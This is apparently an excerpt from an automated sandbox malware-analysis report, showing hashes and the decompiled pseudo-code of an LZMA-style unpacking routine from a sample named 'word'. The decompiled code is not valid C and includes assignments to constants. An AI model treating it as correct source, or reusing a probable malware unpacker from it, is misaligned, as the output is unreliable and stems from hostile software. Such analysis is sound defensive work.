                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
